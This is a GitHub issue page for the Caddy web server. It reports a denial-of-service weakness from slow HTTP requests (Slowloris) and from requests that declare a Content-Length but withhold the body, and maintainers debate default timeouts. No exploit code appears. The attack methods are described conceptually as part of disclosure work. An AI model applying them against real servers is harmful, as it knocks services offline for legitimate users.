-
-
Notifications
You must be signed in to change notification settings - Fork 4k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
DoS vulnerability in Caddy via slow HTTP requests #6663
Comments
You can configure timeouts to deal with this: https://caddyserver.com/docs/caddyfile/options#timeouts |
What's the argument against setting sane defaults like Nginx?
|
Well, this is nothing new. Even with all the timeouts in the world, it's impossible to prevent DoS without additional infrastructure. All you can do with a single server is push the limit as number of connections goes to infinity upward, but this plateaus until you just plain have more resources than the baddies. Caddy sets a sane idle timeout by default, which drops unused connections, which can be reasonably done (hence we do it). Read and write timeouts are risky to have defaults for since they adversely affect those clients who have slow Internet connections, which is the opposite of what we want to do, and in fact harmful, if they cannot access needed information. If even a percentage of the population of Australia or remote parts of Africa or some island in the Pacific all wanted to load your site at once, perhaps in relation to a national emergency, your timeouts would likely sever their access and it would be nearly indistinguishable from a "slowloris" attack. Setting balanced timeouts will only make slowloris incrementally -- not orders of magnitude -- more expensive, so they're not really effective. If someone can't slowloris you with 10 machines because you set timeouts, they probably could with ~30-50, so it's not really that effective. You could set more aggressive timeouts to raise that cost to 100-500 machines, then maybe you're starting to make a dent, but you've also just cut off half your legitimate users. An idle timeout of 75s will greatly impact your site's performance btw, since that means that if a user stays on a page more than ~1.25 minutes, they will have to reconnect after clicking a link. That also expends more server resources, ironically doing the opposite of what you intend. Point is, whether we set default timeouts or not, you should probably set timeouts based on your situation and requirements. They either disconnect legitimate clients or make slowloris easier (but not impossible). We simply assume that most traffic is benign by default (and it is). If you really want to prevent DoS attacks, have more resources than the bad guys. Hence services like Cloudflare exist. |
No question, absolutely, we all agree that good implementors should implement per their patterns and risk and usage. But Caddy is generally wonderful in
I find this argument inconsistent considering the defaults on TLS and ciphers! The min TLS 1.2 with a strong cipher suite is wonderful for new users as it is often the right choice, but you have also shut out lots of antiquated clients including users that may not have the ability to upgrade to a proper device. Part of Caddy's strength to hobby users and corporations is that the defaults are safe, strong, secure. Surely an unlimited read_header timeout isn't consistent with that approach. |
The difference between security protocols and timeouts is that allowing clients to connect with weak security protocols does them harm, but servicing legitimately slow clients does them a benefit. |
Last question and then I'll drop it: do you believe |
Fair question. (That timeout is relatively new btw, only being introduced after the last discussions we had about default timeouts IIRC.) I'm open to considering that and giving it a shot. We've trialed default timeouts before and it kind of backfired. |
Summary
A Denial of Service (DoS) vulnerability exists in Caddy, allowing an attacker to exhaust the server’s process pool by sending slow HTTP requests. This prevents legitimate clients from receiving any response.
Details
Caddy has a limited pool of processes dedicated to handling incoming HTTP requests. Each request is assigned to a process, and the process remains occupied until the request is fully completed. By sending a series of slow HTTP requests (a technique often referred to as Slowloris), an attacker can hold all available processes hostage, effectively preventing the server from handling new incoming requests.
In testing, it appears that the default number of requests required to exhaust the pool is tied to the number of CPU cores available, which is often low enough to make this attack feasible with minimal resources.
Another attack vector involves sending an HTTP request with a
Content-Length
header but without immediately sending the body. Since the server expects the body to match the declaredContent-Length
, it keeps the process occupied, waiting for the data that never arrives. This tactic, combined with the slow requests described earlier, can similarly exhaust all available processes, leading to a denial of service.PoC
This proof of concept demonstrates how sending slow requests can bring down the server.
Impact
This vulnerability significantly impacts the server's availability, making it unable to respond to legitimate HTTP clients. Attackers can perform a low-effort Denial of Service (DoS) by sending slow requests or by using the Content-Length header without sending the body. These attacks effectively take down the server without requiring large amounts of bandwidth or computational power. As a result, this could disrupt services for extended periods, depending on the number of processes and the server’s configuration.
The text was updated successfully, but these errors were encountered: